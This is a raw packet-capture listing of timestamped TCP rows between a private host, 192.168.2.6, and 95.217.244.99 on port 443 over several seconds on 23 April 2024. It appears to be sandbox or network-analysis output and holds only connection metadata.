Apr 23, 2024 21:44:05.728497028 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.728502989 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.728526115 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.728545904 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.731534004 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.731553078 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.731621027 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.731626034 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.731666088 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.734071016 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.734093904 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.734134912 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.734148979 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.734175920 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.734190941 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.737037897 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.737081051 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.737139940 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.737145901 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.737188101 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.739083052 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.739144087 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.739193916 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.739198923 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.739223003 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.739249945 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.742083073 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.742139101 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.742290020 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.742290020 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.742316008 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.742360115 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.743793964 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.743849993 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.743885994 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.743892908 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.743920088 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.743942976 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.746367931 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.746419907 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.746455908 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.746460915 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.746493101 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.746525049 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.749207020 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.749264002 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.749317884 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.749322891 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.749368906 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.749392986 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.751306057 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.751346111 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.751398087 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.751403093 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.751444101 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.753165007 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.753220081 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.753262043 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.753268003 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.753292084 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.753310919 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.755877972 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.755919933 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.755960941 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.755968094 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.755999088 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.756021023 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.757508039 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.757566929 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.757642984 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.757648945 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.757702112 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.757702112 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.760555983 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.760608912 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.760642052 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.760647058 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.760678053 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.760699987 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.760711908 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.760763884 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.760788918 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.760847092 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.760880947 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.760947943 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.761240959 CEST	49713	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.761261940 CEST	443	49713	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.830986023 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.831057072 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:05.831136942 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.831538916 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:05.831552982 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:06.297903061 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:06.298043966 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:06.299146891 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:06.299160957 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:06.301075935 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:06.301080942 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:06.301131010 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:06.301136017 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:06.921935081 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:06.921984911 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:06.922055960 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:06.922358036 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:06.922369957 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:07.305283070 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:07.305454969 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:07.305459976 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:07.305512905 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:07.306591034 CEST	49714	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:07.306613922 CEST	443	49714	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:07.356847048 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:07.356967926 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:07.357461929 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:07.357470989 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:07.359350920 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:07.359357119 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.013307095 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.013402939 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.013506889 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.013755083 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.013787031 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.311144114 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.311240911 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.311240911 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.311290979 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.312189102 CEST	49715	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.312207937 CEST	443	49715	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.477996111 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.478135109 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.478847980 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.478873014 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:08.480622053 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:08.480633974 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.206383944 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.206433058 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.206518888 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.206789017 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.206801891 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.479640961 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.479711056 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.479844093 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.549206972 CEST	49716	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.549249887 CEST	443	49716	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.639326096 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.639460087 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.640037060 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.640048981 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:09.643620968 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:09.643632889 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.328491926 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.328557968 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.328583002 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.328603983 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.328618050 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.328649998 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.328669071 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.328691959 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.425857067 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.425914049 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.425976992 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.426003933 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.426042080 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.426048994 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.564079046 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.564121962 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.564171076 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.564198971 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.564232111 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.564249039 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.659254074 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.659279108 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.659389019 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.659418106 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.659459114 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.732546091 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.732594013 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.732655048 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.732681990 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.732709885 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.732731104 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.784950018 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.785010099 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.785063028 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.785089016 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.785139084 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.785159111 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.827402115 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.827451944 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.827554941 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.827584028 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.827601910 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.827624083 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.866312027 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.866333961 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.866441011 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.866467953 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.866508007 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.907603025 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.907654047 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.907737970 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.907762051 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.907793045 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.907814026 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.948571920 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.948618889 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.948705912 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.948734999 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.948754072 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.948774099 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.984061003 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.984133005 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:10.984174967 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:10.984231949 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.008785009 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.008835077 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.008877039 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.008907080 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.008927107 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.008953094 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.032844067 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.032886982 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.032921076 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.032946110 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.032959938 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.032983065 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.053340912 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.053364038 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.053417921 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.053441048 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.053483009 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.074249029 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.074275017 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.074353933 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.074376106 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.074414015 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.095949888 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.095994949 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.096060038 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.096081018 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.096107006 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.096123934 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.115608931 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.115662098 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.115706921 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.115729094 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.115756989 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.115773916 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.131700993 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.131776094 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.131808043 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.131819010 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.131853104 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.131875992 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.148329973 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.148359060 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.148502111 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.148521900 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.148564100 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.165365934 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.165399075 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.165476084 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.165503979 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.165530920 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.165553093 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.178200960 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.178221941 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.178296089 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.178317070 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.178342104 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.178364992 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.194056988 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.194083929 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.194160938 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.194185019 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.194206953 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.194225073 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.207066059 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.207088947 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.207182884 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.207209110 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.207252026 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.221728086 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.221751928 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.221826077 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.221843958 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.221884012 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.234848022 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.234874010 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.234927893 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.234947920 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.234965086 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.234981060 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.246539116 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.246603966 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.246850014 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.246869087 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.246906996 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.259815931 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.259886026 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.259939909 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.259957075 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.259984970 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.259999990 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.270359993 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.270411015 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.270451069 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.270469904 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.270519972 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.281631947 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.281701088 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.281724930 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.281745911 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.281769037 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.281785965 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.291673899 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.291717052 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.291843891 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.291843891 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.291862965 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.291902065 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.302815914 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.302867889 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.302894115 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.302911043 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.303128004 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.312067986 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.312098026 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.312134981 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.312146902 CEST	443	49717	95.217.244.99	192.168.2.6
Apr 23, 2024 21:44:11.312175035 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.312192917 CEST	49717	443	192.168.2.6	95.217.244.99
Apr 23, 2024 21:44:11.321882963 CEST	443	49717	95.217.244.99	192.168.2.6
